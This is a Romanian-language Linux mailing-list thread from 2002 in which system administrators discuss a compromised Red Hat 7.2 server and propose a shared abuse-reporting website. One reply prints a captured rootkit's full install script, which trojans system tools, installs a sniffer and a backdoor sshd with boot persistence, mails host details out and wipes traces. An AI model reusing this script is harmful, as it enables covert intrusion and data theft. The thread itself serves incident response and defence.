ofer eu hosting T1 -SUA QWEST.NET
On Sat, 25 May 2002, Petre Daniel wrote: > ideea e excelenta.vorbitzi prea mult pe lista,parerea mea. > votatzi un site central (cine se ofera cu hosting) eu n-am prea multa > banda,dar ofer domeniu. > cine se pricepe la php&db sa seteze un mic engine pe site.se inscriu > adminii cu adresele lor shi trimit mailuri cu loguri grepuite frumos la > adresa centrala care sorteaza shi pune pe web cine ataca shi unde. > deshi sunt contracte la mijloc shi destul de multe interese,eu unul daca > vad pe www.abuse.ro ca de la ipul 194.102.92.x s-au facut attempturi sau > incercari de exploatare a serviciilor lu gushteru sau gagiului ala care-shi > tzine un cafe shi el cu greu,ori firmei XXX serioase,fac ceva ca sa vad > cine din retzea mea face prostioare shi daca e posibil sa scap de el. > mi se pare aiurea sa permitem unor pushti sa se joace cu serverele shi sa > foloseasca abuziv banda. > informatzia e cea mai puternica shi daca ne putem oferi unii altora > informatzie valoroasa eu zic s-o facem odata. > loguri am shi eu destul,m-au atacat destui,dar m-am descurcat singur pentru > ca nu shtiu unde-ash putea reclama shi ce s-ar putea face. > de ce sa nu ne ajutam ca admini cand o putem face ? > bla bla. > haidetzi odata. > > Petre L. Daniel,System Administrator > Canad Systems Pitesti Romania > Tel:+4048206200,+4048220044 > http://www.cyber.ro > > t 05:35 PM 5/25/02 -0700, you wrote: > >Hello Petre, > > > >Saturday, May 25, 2002, 5:14:28 PM, you wrote: > > > >PD> 2 mbps cu abuse.zone.ro sa zicem.. > > > >sa vedem intai ca exista interes din partea "target-ului" :) > > > >Gusherul > > > >PD> /me > > > >PD> At 01:08 PM 5/25/02 -0700, you wrote: > > >>Hello paul, > > >> > > >>Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are > > >>rootkituri sariti cu emailurile unde se duc info despre server. Asha > > >>mai scapam de ei oleak:) > > >> > > >>Gushterul > > >>P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk acolo ci > > >>info sha shthie homu' lha khare sha hai dhea in khap. Reformulez cine > > >>face hosting? :) > > >> > > >>Friday, May 24, 2002, 11:38:02 PM, you wrote: > > >> > > >>pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la rh > > >>network si > > >>pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru > > >>pzeur> update-uri la zi. Seamana a wingoz dar merge bine. > > >>pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe > > care le > > >>pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de > > updateuri) > > >>pzeur> cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) > > >>aduci > > >>pzeur> de acolo pachetele corespunzatoare headerelor pe care le pui in > > >>pzeur> /var/spool/up2date si repornesti "up2date -u". > > >> > > >> > > >>pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt > > >>sistem > > >>pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date > > >>-u" cu > > >>pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu > > >>mergeau. > > >>pzeur> asa ca am adus repede respectivele app de pe alt sistem, si > > surpriza... > > >>pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin > > directoare > > >>pzeur> si am gasit in /var/ftp/ un director care nu era acolo ultima data > > >>cind m-am > > >>pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva > > director de > > >>pzeur> librarii unde era cam asa ceva: > > >>pzeur> . > > >>pzeur> .. > > >>pzeur> .lib > > >>pzeur> .tooz > > >> > > >>pzeur> in .tooz era fisierul install: > > >>pzeur> #private version from cur / not hacked by lamme assz as Em|nem or > > >>others! > > >>pzeur> #phear my reverge all u mother fuckers > > >>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun > > >>pzeur> #!/bin/sh > > >>pzeur> unset HISTFILE > > >>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ > > >>pzeur> chattr -iau /bin/ps > > >>pzeur> chattr -iau /bin/ls > > >>pzeur> chattr -iau /bin/netstat > > >>pzeur> chattr -iau /bin/lpd > > >>pzeur> rm -rf /etc/ssh* > > >>pzeur> clear > > >>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib > > >>sh sysinfo1 >> new-host > > >>pzeur> sh ssh_random_key > > >>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ > > >>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ > > >>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ > > >>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps > > >>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls > > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc > > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr > > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file > > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps > > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls > > >>pzeur> mv ps /bin/ps > > >>pzeur> mv ls /bin/ls > > >>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ > > >>pzeur> mv netstat /bin/netstat > > >>pzeur> chown root.root /bin/ls > > >>pzeur> chown root.root /bin/ps > > >>pzeur> chown root.root /bin/netstat > > >>pzeur> mv linsniffer /bin/lpd > > >>pzeur> rm -rf /etc/ssh* > > >>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 > > >>pzeur> rm -rf /usr/sbin/rpc.rstatd > > >>pzeur> rm -rf /usr/sbin/rpc* > > >>pzeur> lpd & > > >>pzeur> ./lpd > > >>pzeur> mv sshd /bin/nfsd > > >>pzeur> mv -f sshd_config /etc/ > > >>pzeur> mv -f ssh_host_key /etc/ > > >>pzeur> mv -f ssh_random_seed /etc/ > > >>pzeur> mv -f ssh_host_key.pub /etc/ > > >>pzeur> rm -rf ssh_random_key > > >>pzeur> chattr +iau /bin/nfsd > > >>pzeur> chattr +iau /etc/sshd_config > > >>pzeur> chattr +iau /etc/ssh_host_key > > >>pzeur> chattr +iau /etc/ssh_random_seed > > >>pzeur> chattr +iau /etc/ssh_host_key.pub > > >>pzeur> nfsd -q -p 50000 > > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit > > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet > > >>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] > > >>pzeur> cat new-host |mail -s > > >>pzeur> #-----done with ssh---- > > >>pzeur> killall -9 portmap > > >>pzeur> killall rpc.statd > > >>pzeur> rm -f /usr/sbin/rpc.statd > > >>echo "ftp">>>/etc/ftpusers > > >>echo "root">>>/etc/ftpusers > > >>pzeur> cat /proc/cpuinfo > > >>pzeur> mv pwd /dev/capi20.20 > > >>pzeur> rm -f sysinfo1 > > >>pzeur> rm -f sysinfo > > >>pzeur> rm -f new-host > > >>pzeur> rm -f sshd > > >>pzeur> cd .. > > >>pzeur> rm -rf s.tgz > > >>pzeur> clear > > >>pzeur> echo "****************************7.1***************************" > > >>pzeur> echo "Oki" > > >>pzeur> echo "***********************SpUrKaTu&TrUnKS********************" > > >> > > >> > > >>pzeur> mai era un fisier .1addr: > > >>pzeur> 2 194.105 > > >>pzeur> 3 6666 > > >>pzeur> 3 6667 > > >>pzeur> 3 54789 > > >>pzeur> 3 31337 > > >>pzeur> 3 6668 > > >>pzeur> 3 6669 > > >>pzeur> 3 6666 > > >>pzeur> 2 194.102.233 > > >>pzeur> 2 209.142.209.161 > > >>pzeur> 2 217.10 > > >>pzeur> 2 213.233 > > >> > > >> > > >>pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai sunt > > >>printre ele : > > >>pzeur> hideps install lpd sense string tcp.log utils wipe > > >>pzeur> .1addr .1file .1proc .ls netstat .ps > > >> > > >>pzeur> cam asta ma mai gasit > > >> > > >>pzeur> in general e bine ai copii originale dupa ls, ps, netstat > > >> > > >>pzeur> bafta > > >> > > >> > > >>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: > > >> > > >> >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. > > >> >> Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. > > >> >> 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu > > >> >> rpm -U --force ... > > >> >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese > > >> >> ascunse: > > >> >> - You have 1 process hidden for readdir command > > >> >> - You have 1 process hidden for ps command > > >> >> 3. chkrootkit "intepeneste" la verificare la pozitia > > >> >> Checking 'aliens'... > > >> >> 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr > > >> >> --> Illegal seek > > >> >> 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware > > >> >> si nu stiu ce... si ca asculta pe portul 7000 > > >> >> 6. In boot.log apare linia > > >> >> ... Starting backdoor daemon... Done, pid=... > > >> >> Acum va intreb: > > >> >> - mai pot fi si alte pachete compromise in afara de cele numite? > > >> >> - ce este cu acele procese ascunse si cum scap de ele? > > >> >> - de ce intepeneste chkrootkit? > > >> >> - daca este intr-adevar vorba de backdoor, cum scap de el? > > >> >> > > >> >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc > > >> >> anticipat pentru ajutor. > > >> >> Gaby > > > >--- > >Pentru dezabonare, trimiteti mail la > >[EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > >REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > --- > Pentru dezabonare, trimiteti mail la > [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > -- Baba Bogdan System Administrator CDS NETWORK, Corpus Christi, TX, US --------------------------------o0()()0o------------------------------- We can forgive a child who is afraid of the dark; the real tragedy of life is when men are afraid of the light. - Plato --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
